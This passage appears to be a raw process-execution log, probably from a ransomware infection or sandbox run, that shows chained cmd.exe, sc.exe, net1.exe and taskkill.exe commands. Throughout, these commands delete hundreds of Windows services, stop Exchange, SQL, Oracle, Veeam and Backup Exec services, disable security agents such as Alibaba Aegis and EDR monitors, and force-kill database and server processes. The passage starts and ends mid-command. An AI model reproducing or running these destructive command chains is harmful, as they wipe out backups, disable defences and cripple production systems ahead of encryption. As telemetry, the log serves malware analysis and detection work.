delete GPSLoginSvr & @sc delete GPSTomcat6 & @sc delete GPSMysqld & @sc delete GPSFtpd & @sc delete "Zabbix Agent" & @sc delete BackupExecAgentAccelerator & @sc delete bedbg & @sc delete BackupExecDeviceMediaService & @sc delete BackupExecRPCService & @sc delete BackupExecAgentBrowser & @sc delete BackupExecJobEngine & @sc delete BackupExecManagementService & @sc delete MDM & @sc delete TxQBService & @sc delete Gailun_Downloader & @sc delete RemoteAssistService & @sc delete YunService & @sc delete Serv-U & @sc delete "EasyFZS Server" & @sc delete "Rpc Monitor" & @sc delete OpenFastAssist & @sc delete "Nuo Update Monitor" & @sc delete "Daemon Service" & @sc delete asComSvc & @sc delete OfficeUpdateService & @sc delete RtcSrv & @sc delete RTCASMCU & @sc delete FTA & @sc delete MASTER & @sc delete NscAuthService & @sc delete MSCRMUnzipService & @sc delete MSCRMAsyncService$maintenance"
8124sc.exe sc delete "UWS LoPriv Services"
7360sc.exe sc delete ftnlsv3
7452sc.exe sc delete ftnlses3
7364sc.exe sc delete FxService
8836sc.exe sc delete "UtilDev Web Server Pro"
9112sc.exe sc delete ftusbrdwks
9092sc.exe sc delete ftusbrdsrv
8896sc.exe sc delete "ZTE USBIP Client Guard"
9580sc.exe sc delete "ZTE USBIP Client"
10000sc.exe sc delete "ZTE FileTranS"
9084sc.exe sc delete wwbizsrv
9448sc.exe sc delete qemu-ga
9304sc.exe sc delete AlibabaProtect
7708sc.exe sc delete ZTEVdservice
9056sc.exe sc delete kbasesrv
10056sc.exe sc delete MMRHookService
10576sc.exe sc delete OracleJobSchedulerORCL
11020sc.exe sc delete IpOverUsbSvc
10344sc.exe sc delete MsDtsServer100
11152sc.exe sc delete KuaiYunTools
10680sc.exe sc delete KMSELDI
9984sc.exe sc delete btPanel
10232sc.exe sc delete Protect_2345Explorer
11284sc.exe sc delete 2345PicSvc
11612sc.exe sc delete vmware-converter-agent
12080sc.exe sc delete vmware-converter-server
11476sc.exe sc delete vmware-converter-worker
10624sc.exe sc delete QQCertificateService
11896sc.exe sc delete OracleRemExecService
11292sc.exe sc delete GPSDaemon
11312sc.exe sc delete GPSUserSvr
12332sc.exe sc delete GPSDownSvr
12744sc.exe sc delete GPSStorageSvr
13272sc.exe sc delete GPSDataProcSvr
12620sc.exe sc delete GPSGatewaySvr
12444sc.exe sc delete GPSMediaSvr
12476sc.exe sc delete GPSLoginSvr
12940sc.exe sc delete GPSTomcat6
12584sc.exe sc delete GPSMysqld
13224sc.exe sc delete GPSFtpd
13164sc.exe sc delete "Zabbix Agent"
13344sc.exe sc delete BackupExecAgentAccelerator
13648sc.exe sc delete bedbg
14100sc.exe sc delete BackupExecDeviceMediaService
13452sc.exe sc delete BackupExecRPCService
13728sc.exe sc delete BackupExecAgentBrowser
12348sc.exe sc delete BackupExecJobEngine
13968sc.exe sc delete BackupExecManagementService
13360sc.exe sc delete MDM
2588sc.exe sc delete TxQBService
13792sc.exe sc delete Gailun_Downloader
14436sc.exe sc delete RemoteAssistService
14728sc.exe sc delete YunService
14952sc.exe sc delete Serv-U
14516sc.exe sc delete "EasyFZS Server"
14936sc.exe sc delete "Rpc Monitor"
14640sc.exe sc delete OpenFastAssist
14620sc.exe sc delete "Nuo Update Monitor"
14116sc.exe sc delete "Daemon Service"
15280sc.exe sc delete asComSvc
15244sc.exe sc delete OfficeUpdateService
14864cmd.exe cmd /c "@color b & sc delete MSCRMAsyncService & @sc delete REPLICA & @sc delete RTCATS & @sc delete RTCAVMCU & @sc delete RtcQms & @sc delete RTCMEETINGMCU & @sc delete RTCIMMCU & @sc delete RTCDATAMCU & @sc delete RTCCDR & @sc delete ProjectEventService16 & @sc delete ProjectQueueService16 & @sc delete SPAdminV4 & @sc delete SPSearchHostController & @sc delete SPTimerV4 & @sc delete SPTraceV4 & @sc delete OSearch16 & @sc delete ProjectCalcService16 & @sc delete c2wts & @sc delete AppFabricCachingService & @sc delete ADWS & @sc delete MotionBoard57 & @sc delete MotionBoardRCService57 & @sc delete vsvnjobsvc & @sc delete VisualSVNServer & @sc delete "FlexNet Licensing Service 64" & @sc delete BestSyncSvc & @sc delete LPManager & @sc delete MediatekRegistryWriter & @sc delete RaAutoInstSrv_RT2870 & @sc delete CobianBackup10 & @sc delete SQLANYs_sem5 & @sc delete CASLicenceServer & @sc delete SQLService & @sc delete semwebsrv & @sc delete TbossSystem & @sc delete ErpEnvSvc & @sc delete Mysoft.Autoupgrade.DispatchService & @sc delete Mysoft.Autoupgrade.UpdateService & @sc delete Mysoft.Config.WindowsService & @sc delete Mysoft.DataCenterService & @sc delete Mysoft.SchedulingService & @sc delete Mysoft.Setup.InstallService & @sc delete MysoftUpdate & @sc delete edr_monitor & @sc delete abs_deployer & @sc delete savsvc & @sc delete ShareBoxMonitorService & @sc delete ShareBoxService & @sc delete CloudExchangeService & @sc delete "U8WorkerService2" & @sc delete CIS & @sc delete EASService & @sc delete KICkSvr & @sc delete "OSP Service" & @sc delete U8SmsSrv & @sc delete OfficeClearCache & @sc delete TurboCRM70 & @sc delete U8DispatchService & @sc delete U8EISService & @sc delete U8EncryptService & @sc delete U8GCService & @sc delete U8KeyManagePool & @sc delete "U8MPool" & @sc delete U8SCMPool & @sc delete U8SLReportService & @sc delete U8TaskService & @sc delete "U8WebPool" & @sc delete UFAllNet & @sc delete UFReportService & @sc delete UTUService & @sc delete "U8WorkerService1""
7208sc.exe sc delete MSCRMAsyncService
7752sc.exe sc delete REPLICA
7488sc.exe sc delete RTCATS
7504sc.exe sc delete RTCAVMCU
8632sc.exe sc delete RtcQms
8316sc.exe sc delete RTCMEETINGMCU
9160sc.exe sc delete RTCIMMCU
9020sc.exe sc delete RTCDATAMCU
9468sc.exe sc delete RTCCDR
10032sc.exe sc delete ProjectEventService16
9608sc.exe sc delete ProjectQueueService16
9416sc.exe sc delete SPAdminV4
8360sc.exe sc delete SPSearchHostController
9888sc.exe sc delete SPTimerV4
10452sc.exe sc delete SPTraceV4
10856sc.exe sc delete OSearch16
11184sc.exe sc delete ProjectCalcService16
10868sc.exe sc delete c2wts
7180sc.exe sc delete AppFabricCachingService
11028sc.exe sc delete ADWS
10500sc.exe sc delete MotionBoard57
10244sc.exe sc delete MotionBoardRCService57
11248sc.exe sc delete vsvnjobsvc
11444sc.exe sc delete VisualSVNServer
11880sc.exe sc delete "FlexNet Licensing Service 64"
12256sc.exe sc delete BestSyncSvc
11552sc.exe sc delete LPManager
11668sc.exe sc delete MediatekRegistryWriter
11488sc.exe sc delete RaAutoInstSrv_RT2870
11088sc.exe sc delete CobianBackup10
12048sc.exe sc delete SQLANYs_sem5
12420sc.exe sc delete CASLicenceServer
12640sc.exe sc delete SQLService
12908sc.exe sc delete semwebsrv
12308sc.exe sc delete TbossSystem
12848sc.exe sc delete ErpEnvSvc
13172sc.exe sc delete Mysoft.Autoupgrade.DispatchService
13072sc.exe sc delete Mysoft.Autoupgrade.UpdateService
13080sc.exe sc delete Mysoft.Config.WindowsService
11744sc.exe sc delete Mysoft.DataCenterService
12396sc.exe sc delete Mysoft.SchedulingService
13476sc.exe sc delete Mysoft.Setup.InstallService
13904sc.exe sc delete MysoftUpdate
14200sc.exe sc delete edr_monitor
13308sc.exe sc delete abs_deployer
13368sc.exe sc delete savsvc
14168sc.exe sc delete ShareBoxMonitorService
13908sc.exe sc delete ShareBoxService
13628sc.exe sc delete CloudExchangeService
12972sc.exe sc delete "U8WorkerService2"
13580sc.exe sc delete CIS
14376sc.exe sc delete EASService
14596sc.exe sc delete KICkSvr
14868sc.exe sc delete "OSP Service"
15148sc.exe sc delete U8SmsSrv
14588sc.exe sc delete OfficeClearCache
15060sc.exe sc delete TurboCRM70
15316sc.exe sc delete U8DispatchService
15296sc.exe sc delete U8EISService
14984sc.exe sc delete U8EncryptService
14872sc.exe sc delete U8GCService
14956sc.exe sc delete U8KeyManagePool
15440cmd.exe cmd /c "color a & @net stop U8WorkerService1 & @net stop U8WorkerService2 & @net stop "memcached Server" & @net stop Apache2.4 & @net stop UFIDAWebService & @net stop MSComplianceAudit & @net stop MSExchangeADTopology & @net stop MSExchangeAntispamUpdate & @net stop MSExchangeCompliance & @net stop MSExchangeDagMgmt & @net stop MSExchangeDelivery & @net stop MSExchangeDiagnostics & @net stop MSExchangeEdgeSync & @net stop MSExchangeFastSearch & @net stop MSExchangeFrontEndTransport & @net stop MSExchangeHM & @net stop MSSQL$SQL2008 & @net stop MSExchangeHMRecovery & @net stop MSExchangeImap4 & @net stop MSExchangeIMAP4BE & @net stop MSExchangeIS & @net stop MSExchangeMailboxAssistants & @net stop MSExchangeMailboxReplication & @net stop MSExchangeNotificationsBroker & @net stop MSExchangePop3 & @net stop MSExchangePOP3BE & @net stop MSExchangeRepl & @net stop MSExchangeRPC & @net stop MSExchangeServiceHost & @net stop MSExchangeSubmission & @net stop MSExchangeThrottling & @net stop MSExchangeTransport & @net stop MSExchangeTransportLogSearch & @net stop MSExchangeUM & @net stop MSExchangeUMCR & @net stop MySQL5_OA"
7500net1.exe C:\Windows\system32\net1 stop U8WorkerService1
8040net1.exe C:\Windows\system32\net1 stop U8WorkerService2
8208net1.exe C:\Windows\system32\net1 stop "memcached Server"
8488net1.exe C:\Windows\system32\net1 stop Apache2.4
9744net1.exe C:\Windows\system32\net1 stop UFIDAWebService
9788net1.exe C:\Windows\system32\net1 stop MSComplianceAudit
8924net1.exe C:\Windows\system32\net1 stop MSExchangeADTopology
10472net1.exe C:\Windows\system32\net1 stop MSExchangeAntispamUpdate
10252net1.exe C:\Windows\system32\net1 stop MSExchangeCompliance
10640net1.exe C:\Windows\system32\net1 stop MSExchangeDagMgmt
10800net1.exe C:\Windows\system32\net1 stop MSExchangeDelivery
288net1.exe C:\Windows\system32\net1 stop MSExchangeDiagnostics
11844net1.exe C:\Windows\system32\net1 stop MSExchangeEdgeSync
11408net1.exe C:\Windows\system32\net1 stop MSExchangeFastSearch
12236net1.exe C:\Windows\system32\net1 stop MSExchangeFrontEndTransport
11344net1.exe C:\Windows\system32\net1 stop MSExchangeHM
12824net1.exe C:\Windows\system32\net1 stop MSSQL$SQL2008
12660net1.exe C:\Windows\system32\net1 stop MSExchangeHMRecovery
13228net1.exe C:\Windows\system32\net1 stop MSExchangeImap4
13108net1.exe C:\Windows\system32\net1 stop MSExchangeIMAP4BE
12820net1.exe C:\Windows\system32\net1 stop MSExchangeIS
14012net1.exe C:\Windows\system32\net1 stop MSExchangeMailboxAssistants
500net1.exe C:\Windows\system32\net1 stop MSExchangeMailboxReplication
13488net1.exe C:\Windows\system32\net1 stop MSExchangeNotificationsBroker
14280net1.exe C:\Windows\system32\net1 stop MSExchangePop3
14000net1.exe C:\Windows\system32\net1 stop MSExchangePOP3BE
14676net1.exe C:\Windows\system32\net1 stop MSExchangeRepl
14244net1.exe C:\Windows\system32\net1 stop MSExchangeRPC
14592net1.exe C:\Windows\system32\net1 stop MSExchangeServiceHost
15320net1.exe C:\Windows\system32\net1 stop MSExchangeSubmission
15328net1.exe C:\Windows\system32\net1 stop MSExchangeThrottling
15396cmd.exe cmd /c "color a & @net stop HaoZipSvc & @net stop "igfxCUIService2.0.0.0" & @net stop Realtek11nSU & @net stop xenlite & @net stop XenSvc & @net stop Apache2.2 & @net stop "Synology Drive VSS Service x64" & @net stop DellDRLogSvc & @net stop FirebirdGuardianDeafaultInstance & @net stop JWEM3DBAUTORun & @net stop JWRinfoClientService & @net stop JWService & @net stop Service2 & @net stop RapidRecoveryAgent & @net stop FirebirdServerDefaultInstance & @net stop AdobeARMservice & @net stop VeeamCatalogSvc & @net stop VeeanBackupSvc & @net stop VeeamTransportSvc & @net stop TPlusStdAppService1300 & @net stop TPlusStdTaskService1300 & @net stop TPlusStdUpgradeService1300 & @net stop TPlusStdWebService1300 & @net stop VeeamNFSSvc & @net stop VeeamDeploySvc & @net stop VeeamCloudSvc & @net stop VeeamMountSvc & @net stop VeeamBrokerSvc & @net stop VeeamDistributionSvc & @net stop tmlisten & @net stop ServiceMid & @net stop 360EntPGSvc & @net stop ClickToRunSvc & @net stop RavTask & @net stop AngelOfDeath & @net stop d_safe & @net stop NFLicenceServer & @net stop "NetVault Process Manager" & @net stop RavService & @net stop DFServ & @net stop IngressMgr & @net stop EvtSys & @net stop K3ClouManager & @net stop NFVPrintServer & @net stop RTCAVMCU & @net stop CobianBackup10 & @net stop GNWebService & @net stop Mysoft.SchedulingService & @net stop AgentX & @net stop SentinelKeysServer & @net stop DGPNPSEV & @net stop TurboCRM70 & @net stop NFSysService & @net stop U8DispatchService & @net stop NFOTPService & @net stop U8EISService & @net stop U8EncryptService & @net stop U8GCService & @net stop U8KeyManagePool & @net stop U8MPool & @net stop U8SCMPool & @net stop U8SLReportService & @net stop U8TaskService & @net stop U8WebPool & @net stop UFAllNet & @net stop UFReportService & @net stop UTUService"
7608net1.exe C:\Windows\system32\net1 stop HaoZipSvc
8260net1.exe C:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"
7968net1.exe C:\Windows\system32\net1 stop Realtek11nSU
8768net1.exe C:\Windows\system32\net1 stop xenlite
10052net1.exe C:\Windows\system32\net1 stop XenSvc
8884net1.exe C:\Windows\system32\net1 stop Apache2.2
8344net1.exe C:\Windows\system32\net1 stop "Synology Drive VSS Service x64"
10548net1.exe C:\Windows\system32\net1 stop DellDRLogSvc
11224net1.exe C:\Windows\system32\net1 stop FirebirdGuardianDeafaultInstance
10312net1.exe C:\Windows\system32\net1 stop JWEM3DBAUTORun
11240net1.exe C:\Windows\system32\net1 stop JWRinfoClientService
10608net1.exe C:\Windows\system32\net1 stop JWService
11648net1.exe C:\Windows\system32\net1 stop Service2
11580net1.exe C:\Windows\system32\net1 stop RapidRecoveryAgent
11544net1.exe C:\Windows\system32\net1 stop FirebirdServerDefaultInstance
11848net1.exe C:\Windows\system32\net1 stop AdobeARMservice
12384net1.exe C:\Windows\system32\net1 stop VeeamCatalogSvc
12292net1.exe C:\Windows\system32\net1 stop VeeanBackupSvc
13116net1.exe C:\Windows\system32\net1 stop VeeamTransportSvc
11720net1.exe C:\Windows\system32\net1 stop TPlusStdAppService1300
12600net1.exe C:\Windows\system32\net1 stop TPlusStdTaskService1300
13412net1.exe C:\Windows\system32\net1 stop TPlusStdUpgradeService1300
14052net1.exe C:\Windows\system32\net1 stop TPlusStdWebService1300
12484net1.exe C:\Windows\system32\net1 stop VeeamNFSSvc
11756net1.exe C:\Windows\system32\net1 stop VeeamDeploySvc
11496net1.exe C:\Windows\system32\net1 stop VeeamCloudSvc
13924net1.exe C:\Windows\system32\net1 stop VeeamMountSvc
14772net1.exe C:\Windows\system32\net1 stop VeeamBrokerSvc
14396net1.exe C:\Windows\system32\net1 stop VeeamDistributionSvc
14284net1.exe C:\Windows\system32\net1 stop tmlisten
14452net1.exe C:\Windows\system32\net1 stop ServiceMid
12968cmd.exe cmd /c "color a & @net stop UIODetect & @net stop VMwareHostd & @net stop TeamViewer8 & @net stop VMUSBArbService & @net stop VMAuthdService & @net stop wanxiao-monitor & @net stop WebAttendServer & @net stop mysqltransport & @net stop VMnetDHCP & @net stop "VMware NAT Service" & @net stop Tomcat8 & @net stop TeamViewer & @net stop QPCore & @net stop CASLicenceServer & @net stop CASWebServer & @net stop AutoUpdateService & @net stop "Alibaba Security Aegis Detect Service" & @net stop "Alibaba Security Aegis Update Service" & @net stop "AliyunService" & @net stop CASXMLService & @net stop AGSService & @net stop RapService & @net stop DDNSService & @net stop iNethinkSQLBackupSvc & @net stop CASVirtualDiskService & @net stop CASMsgSrv & @net stop "OracleOraDb10g_homeliSQL*Plus" & @net stop OracleDBConsoleilas & @net stop MySQL & @net stop TPlusStdAppService1220 & @net stop TPlusStdTaskService1220 & @net stop TPlusStdUpgradeService1220 & @net stop K3MobileServiceManage & @net stop "FileZilla Server" & @net stop DDVRulesProcessor & @net stop ImtsEventSvr & @net stop AutoUpdatePatchService & @net stop OMAILREPORT & @net stop "Dell Hardware Support" & @net stop SupportAssistAgent & @net stop K3MMainSuspendService & @net stop KpService & @net stop ceng_web_svc_d & @net stop KugouService & @net stop pcas & @net stop U8SendMailAdmin & @net stop "Bonjour Service" & @net stop "Apple Mobile Device Service" & @net stop "ABBYY.Licensing.FineReader.Professional.12.0""
8088net1.exe C:\Windows\system32\net1 stop UIODetect
8484net1.exe C:\Windows\system32\net1 stop VMwareHostd
8920net1.exe C:\Windows\system32\net1 stop TeamViewer8
8412net1.exe C:\Windows\system32\net1 stop VMUSBArbService
9792net1.exe C:\Windows\system32\net1 stop VMAuthdService
9672net1.exe C:\Windows\system32\net1 stop wanxiao-monitor
8892net1.exe C:\Windows\system32\net1 stop WebAttendServer
10068net1.exe C:\Windows\system32\net1 stop mysqltransport
10876net1.exe C:\Windows\system32\net1 stop VMnetDHCP
9504net1.exe C:\Windows\system32\net1 stop "VMware NAT Service"
11008net1.exe C:\Windows\system32\net1 stop Tomcat8
2528net1.exe C:\Windows\system32\net1 stop TeamViewer
11760net1.exe C:\Windows\system32\net1 stop QPCore
11536net1.exe C:\Windows\system32\net1 stop CASLicenceServer
1272net1.exe C:\Windows\system32\net1 stop CASWebServer
11328net1.exe C:\Windows\system32\net1 stop AutoUpdateService
12340net1.exe C:\Windows\system32\net1 stop "Alibaba Security Aegis Detect Service"
13012net1.exe C:\Windows\system32\net1 stop "Alibaba Security Aegis Update Service"
12956net1.exe C:\Windows\system32\net1 stop "AliyunService"
2360net1.exe C:\Windows\system32\net1 stop CASXMLService
13264net1.exe C:\Windows\system32\net1 stop AGSService
13092net1.exe C:\Windows\system32\net1 stop RapService
13964net1.exe C:\Windows\system32\net1 stop DDNSService
13420net1.exe C:\Windows\system32\net1 stop iNethinkSQLBackupSvc
14268net1.exe C:\Windows\system32\net1 stop CASVirtualDiskService
14028net1.exe C:\Windows\system32\net1 stop CASMsgSrv
14204net1.exe C:\Windows\system32\net1 stop "OracleOraDb10g_homeliSQL*Plus"
14340net1.exe C:\Windows\system32\net1 stop OracleDBConsoleilas
14916net1.exe C:\Windows\system32\net1 stop MySQL
14652net1.exe C:\Windows\system32\net1 stop TPlusStdAppService1220
15228net1.exe C:\Windows\system32\net1 stop TPlusStdTaskService1220
3040net1.exe C:\Windows\system32\net1 stop TPlusStdUpgradeService1220
13872net.exe net stop K3MobileServiceManage
15376cmd.exe cmd /c "color e & @taskkill /IM sqlservr.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM java.exe /F & @taskkill /IM fdhost.exe /F & @taskkill /IM fdlauncher.exe /F & @taskkill /IM reportingservicesservice.exe /F & @taskkill /IM softmgrlite.exe /F & @taskkill /IM sqlbrowser.exe /F & @taskkill /IM ssms.exe /F & @taskkill /IM vmtoolsd.exe /F & @taskkill /IM baidunetdisk.exe /F & @taskkill /IM yundetectservice.exe /F & @taskkill /IM ssclient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM RAVCp164.exe /F & @taskkill /IM igfxEM.exe /F & @taskkill /IM igfxHK.exe /F & @taskkill /IM igfxTray.exe /F & @taskkill /IM 360bdoctor.exe /F & @taskkill /IM GNCEFExternal.exe /F & @taskkill /IM PrivacyIconClient.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM GoogleCrashHandler.exe /F & @taskkill /IM GoogleCrashHandler64.exe /F & @taskkill /IM GoogleUpdate.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM "FileZilla server.exe" /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM UIODetect.exe /F & @taskkill /IM AutoDealService.exe /F & @taskkill /IM Admin.exe /F & @taskkill /IM IDDAService.exe /F & @taskkill /IM EnergyDataService.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM MPService.exe /F & @taskkill /IM TransMain.exe /F & @taskkill /IM DAService.exe /F & @taskkill /IM tomcat7.exe /F & @taskkill /IM cohernece.exe /F & @taskkill /IM vmware-tray.exe /F & @taskkill /IM MsDtsSrvr.exe /F & @taskkill /IM Kingdee.K3.CRM.MMC.MMCService.exe /F & @taskkill /IM Kingdee.k3.Weixin.ClientService.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.BkgSvcHost.exe /F & @taskkill /IM Kingdee.K3.HR.Server.exe /F & @taskkill /IM Kingdee.K3.PUBLIC.KDSvrMgrHost.exe /F & @taskkill /IM tomcat5.exe /F & @taskkill /IM Kingdee.DeskTool.exe /F & @taskkill /IM UserClient.exe /F & @taskkill /IM GNAupdaemon.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM ImtsEventSvr.exe /F & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM 360EnterpriseDiskUI.exe /F & @taskkill /IM msmdsrv.exe /F & @taskkill /IM UpdateData.exe /F & @taskkill /IM WebApi.Host.exe /F & @taskkill /IM VGAuthService.exe /F & @taskkill /IM omtsreco.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM msdtc.exe /F & @taskkill /IM mmc.exe /F & @taskkill /IM emagent.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM tomcat8.exe /F & @taskkill /IM QQprotect.exe /F & @taskkill /IM isqlplussvc.exe /F & @taskkill /IM nmesrvc.exe /F & @taskkill /IM mysqld.exe /F & @taskkill /IM jusched.exe /F & @taskkill /IM MtxHotPlugService.exe /F & @taskkill /IM jucheck.exe /F & @taskkill /IM wordpad.exe /F & @taskkill /IM SecureCRT.exe /F & @taskkill /IM chrome.exe /F & @taskkill /IM Thunder.exe /F"
7196taskkill.exe taskkill /IM sqlservr.exe /F
8152taskkill.exe taskkill /IM httpd.exe /F
9140taskkill.exe taskkill /IM java.exe /F
10136taskkill.exe taskkill /IM fdhost.exe /F
8868taskkill.exe taskkill /IM fdlauncher.exe /F
11252taskkill.exe taskkill /IM reportingservicesservice.exe /F
10528taskkill.exe taskkill /IM softmgrlite.exe /F
11796taskkill.exe taskkill /IM sqlbrowser.exe /F
11696taskkill.exe taskkill /IM ssms.exe /F
13192taskkill.exe taskkill /IM vmtoolsd.exe /F
12852taskkill.exe taskkill /IM baidunetdisk.exe /F
13596taskkill.exe taskkill /IM yundetectservice.exe /F
13804taskkill.exe taskkill /IM ssclient.exe /F
13100taskkill.exe taskkill /IM GNAupdaemon.exe /F
15276taskkill.exe taskkill /IM RAVCp164.exe /F
14504cmd.exe cmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"
7788taskkill.exe taskkill /IM ThunderPlatform.exe /F
8500taskkill.exe taskkill /IM iexplore.exe /F
9172taskkill.exe taskkill /IM vm-agent.exe /F
10204taskkill.exe taskkill /IM vm-agent-daemon.exe /F
9400taskkill.exe taskkill /IM eSightService.exe /F
10904taskkill.exe taskkill /IM cygrunsrv.exe /F
1308taskkill.exe taskkill /IM wrapper.exe /F
10932taskkill.exe taskkill /IM nginx.exe /F
11384taskkill.exe taskkill /IM node.exe /F
12984taskkill.exe taskkill /IM sshd.exe /F
12764taskkill.exe taskkill /IM vm-tray.exe /F
13676taskkill.exe taskkill /IM iempwatchdog.exe /F
13620taskkill.exe taskkill /IM sqlwriter.exe /F
14016taskkill.exe taskkill /IM php.exe /F
15348taskkill.exe taskkill /IM "notepad++.exe" /F
14672cmd.exe cmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe 